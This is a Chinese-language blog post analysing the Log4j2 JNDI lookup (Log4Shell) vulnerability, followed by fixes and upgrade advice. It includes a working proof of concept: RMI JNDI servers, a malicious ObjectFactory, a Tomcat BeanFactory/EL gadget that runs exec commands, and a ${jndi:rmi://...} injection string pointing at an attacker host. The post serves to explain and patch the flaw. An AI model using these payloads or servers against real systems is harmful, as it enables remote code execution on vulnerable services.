【java】log4j2核弹级漏洞原理和分析
1.概述
转载:log4j2核弹级漏洞原理和分析 并且补充。
2.漏洞是怎么发现的?
3.漏洞问题重现
依赖如下
<dependencies><!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core --><dependency><groupId>org.apache.logging.log4j</groupId><artifactId>log4j-core</artifactId><version>2.13.3</version></dependency><!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api --><dependency><groupId>org.apache.logging.log4j</groupId><artifactId>log4j-api</artifactId><version>2.13.3</version></dependency></dependencies>
3.1 常规的日志写法
一般来说我们是这么写日志的。因为这个demo我仅仅只依赖了log4j2,所以代码就直接调用log4j2的api记录日志了。
public class Main {private static final Logger logger = LogManager.getLogger();public static void main(String[] args) {String content = "world";logger.trace("hello {}",content);}
}
上面这个应该是我们非常常用的一种日志记录手法了。输出的结果应该是hello world
3.2 lookups
不过log4j2并不满足上面的功能,他们提供了一种叫lookups的功能
这功能强大啊,我们用demo看一下:
public class Main {private static final Logger logger = LogManager.getLogger();public static void main(String[] args) {String content = "world";logger.trace("hello {}",content);//https://logging.apache.org/log4j/2.x/manual/lookups.htmlString content2 = "${java:os}";logger.trace("hello {}",content2);String content3 = "${java:vm}";logger.trace("hello {}",content3);}
}
我们看下输出的结果:
2021-12-11 20:03:29.751 [main] TRACE [13] - hello world
2021-12-11 20:03:29.755 [main] TRACE [17] - hello Windows 10 10.0, architecture: amd64-64
2021-12-11 20:03:29.756 [main] TRACE [19] - hello Java HotSpot(TM) 64-Bit Server VM (build 25.261-b12, mixed mode)
从结果上可以看到,输出的并不是hello ${java:os}和hello ${java:vm}
,而是当前服务的操作系统信息和虚拟机信息。其实如果仅仅是这样,那也算不上什么漏洞,只能说功能强大而已。
3.3 Jndi Lookup
但是,log4j2还支持了Jndi Lookup
这就很要命了。为了观察这个问题,我们先启动个JNDI的服务看看
public class SimpleJndiServer {public static void main(String[] args) {try {Registry registry = LocateRegistry.createRegistry(1099);System.out.println("create rmi 1099");Reference reference = new Reference("com.skyline.log4j2.demo.jndi.JndiObj", "com.skyline.log4j2.demo.jndi.JndiObj", null);ReferenceWrapper wrapper = new ReferenceWrapper(reference);registry.bind("demo", wrapper);} catch (RemoteException | NamingException | AlreadyBoundException e) {e.printStackTrace();}}
}
public class JndiObj implements ObjectFactory {static {System.out.println("this is JndiObj,i'm here!");try {//打开远程链接Runtime.getRuntime().exec("mstsc");} catch (IOException e) {e.printStackTrace();}}private String name;public String getName() {return name;}public void setName(String name) {this.name = name;}@Overridepublic Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {return new JndiObj();}@Overridepublic String toString() {return "JndiObj{" +"name='" + name + '\'' +'}';}
}
然后,我们再写日志
public class Main {private static final Logger logger = LogManager.getLogger();public static void main(String[] args) {//JNDI注入参考链接//https://blog.csdn.net/caiqiiqi/article/details/105976072//192.168.31.13为客户端ip(攻击者ip),不是服务ipSystem.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");String content4 = "${jndi:rmi://192.168.31.13:1099/demo}";logger.trace("hello {}",content4);}
}
可以看到这次我日志中的内容变成了${jndi:rmi://192.168.31.13:1099/demo}
,这里需要注意的是192.168.31.13
是我的本机ip,也就是攻击者的ip。效果如下:
通过log4j2调用JNDI服务,我成功的打开了一个远程桌面。而且我写在JndiObj对象上的日志信息是输出在我的日志服务上的
。也就是说,通过JNDI我(攻击者)成功的上传了自己的代码到用户服务中,这就很可怕了。
前面之所以打开的是远程桌面是因为在这里我是这么写的,但是,如果我写点别的呢?
很多时候我们记录在日志中的动态参数都是对象,这些对象可能是从前端或者别的服务请求过来的。比如一个登录接口,如果User对象中的userName的值就是我们上面写的${jndi:rmi://192.168.31.13:1099/demo}
,那后果真的是不堪设想…所以说是核弹级漏洞,也不算过分。
这个用下图表示就是
卡在登录流程之后,你可以执行任意操作,拷贝代码呀,调用数据库呀,各种操作。
4.高逼格的JNDI代码
附一个高逼格的JNDI代码注入写法:
主要就是用到了
implementation 'org.apache.tomcat.embed:tomcat-embed-core:8.5.11'
implementation 'org.glassfish:jakarta.el:3.0.3'
代码如下:
public class EvalJndiServer {public static void main(String[] args) {try {Registry registry = LocateRegistry.createRegistry(1098);//通过EL打开计算器ResourceRef resourceRef = new ResourceRef("javax.el.ELProcessor", (String)null, "", "", true, "org.apache.naming.factory.BeanFactory", (String)null);resourceRef.add(new StringRefAddr("forceString", "a=eval"));resourceRef.add(new StringRefAddr("a", "Runtime.getRuntime().exec(\"calc\")"));ReferenceWrapper referenceWrapper = new ReferenceWrapper(resourceRef);registry.bind("EvalObj", referenceWrapper);} catch (RemoteException | NamingException | AlreadyBoundException e) {e.printStackTrace();}}
}
漏洞补救
log4j2.formatMsgNoLookups=true按照官方api解释说明,当这个值为true时,就不执行lookup了。
2.防火墙,禁止应用服务访问奇怪的ip
5.漏洞解决
升级到2.17.0
implementation "org.apache.logging.log4j:log4j-core:2.17.0"
implementation "org.apache.logging.log4j:log4j-api:2.17.0"
implementation "org.apache.logging.log4j:log4j-jul:2.17.0"
implementation "org.apache.logging.log4j:log4j-slf4j-impl:2.17.0"
【java】log4j2核弹级漏洞原理和分析相关推荐
- Apache Log4j2 核弹级漏洞
近日,Apache Log4j2 的远程代码执行漏洞刷爆朋友圈,该漏洞一旦被攻击者利用会造成严重危害.而且此次漏洞影响巨大,很多网站如百度等都是此次 Log4j 远程代码执行漏洞的受害者,很多互联网企 ...
- Log4j2核弹级漏洞线上修复方案!
一.漏洞描述2月9日晚,Apache Log4j2反序列化远程代码执行漏洞细节已被公开,Apache Log4j-2中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利 ...
- log4j2核弹级漏洞靶场复现(反弹shell)
环境搭建: 本次漏洞复现采用vulfocus的log4j2靶场docker 使用Kali系统进行复现实验 搭建docker拉取漏洞镜像可参考以下链接: https://blog.csdn.net/we ...
- JDK 商用正式免费、Log4j2 爆核弹级漏洞、LayUI 下线...2021 发生的 10 件大事。。。
首先祝大家新年快乐,假期都玩的开心吧? 去年栈长给大家盘点了<Java 开发行业 2020 年发生的几件大事>,2022 年来了,也必须对 2021 做个总结了,2021 年 " ...
- Log4j 爆发“核弹级”漏洞、工信部力推开源软件发展、“龙腾计划”启动|开源月报 Vol. 02...
「WeOpen Insight」是腾源会全新推出的"开源趋势与开源洞见"内容专栏,不定期为读者呈现开源圈内的第一手快讯.优质工具盘点等,洞察开源技术发展的风向标,预见未来趋势. P ...
- Coinbase 现“市场核弹级”漏洞,颁发25万美元奖励
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 密币交易平台 Coinbase 将其史上最大的漏洞奖励25万美元发给发现可使用户出售他人比特币的"市场核弹级"漏洞. Coi ...
- [ 新出漏洞篇 ] 核弹级漏洞 Log4j2 RCE 漏洞爆出,开发圈苦逼,安全圈过年,你赶上了吗 ?(外行都能看懂的漏洞分析)
Log4j2相信大家不陌生了~~~哈哈哈哈. 相信大家已经被 Log4j2 的重大漏洞刷屏了.几乎没有互联网公司幸免. 估计有不少开发的小伙伴在此前为了修 bug 已经累趴下了. 估计也有不少安全圈的 ...
- 核弹级漏洞!我把log4j扒给你看!
相信大家这两天应该被这么一条新闻刷屏了: 这个漏洞到底是怎么回事? 核弹级,真的有那么厉害吗? 怎么利用这个漏洞呢? 我看了很多技术分析文章,都太过专业,很多非Java技术栈或者不搞安全的人只能看个一 ...
- 核弹级漏洞,把 log4j 扒给你看!
作者 | 轩辕之风O 来源 | 编程技术宇宙 相信大家这两天应该被这么一条新闻刷屏了: 这个漏洞到底是怎么回事? 核弹级,真的有那么厉害吗? 怎么利用这个漏洞呢? 我看了很多技术分析文章,都太过专业, ...
最新文章
- (57)模拟线程切换
- java编程好文章链接收集
- 语音识别维特比解码_HMM连续语音识别中Viterbi算法的优化及应用
- python批量更改文件后缀名
- python实现用户登录_Python实现简单的用户登录功能并且限制次数
- 解决Charles Response 中文乱码
- MFC CImageList 详解
- 松翰单片机数码管c语言,松翰单片机定时中断数码管程序
- 全链路UI设计师了解一下
- python三张照片画面拼接
- 微信头像跨域问题解决
- jquery 时间戳与日期转换
- 郝健: Linux内存管理学习笔记-第1节课【转】
- H5项目(基于vue框架)常见问题及注意事项
- stm32单片机+amg8833+红外热成像/单片机红外测温成像/stm32 amg8833红外热成像
- 消消乐php源码,手游泡泡消消乐设计(内附代码)
- 惠普刀片服务器硬件安装配置手册
- 当下的力量 读书笔记
- Python参数校验工具:validate.py
- 四面阿里成功定级P6,想和Java程序员谈一谈
热门文章
- 苹果计划2025年推出全自动驾驶电动汽车:没有方向盘和踏板
- 王兴针对“共同富裕”表态,称其根植于美团基因中
- 苏宁易购第二次债券购回基本方案:购回资金总额20亿元
- 蚂蚁战配基金已售罄两只 累计关注人数超500万
- 端午小长假全国接待游客4880万人次,客流同比恢复5成
- 三星GalaxyNote20系列全新渲染图曝光:屏下摄像头来了?
- BOSS直聘发起“逆行者先行”招聘专场:优先录取抗疫志愿者
- 被限高消费后,王思聪又有新动作:新增对外投资...
- 你以为环幕屏就结束了?真正的小米MIX 4或下月发布:1亿像素相机加持
- 魅族16s安兔兔跑分揭晓:在优化中不断提高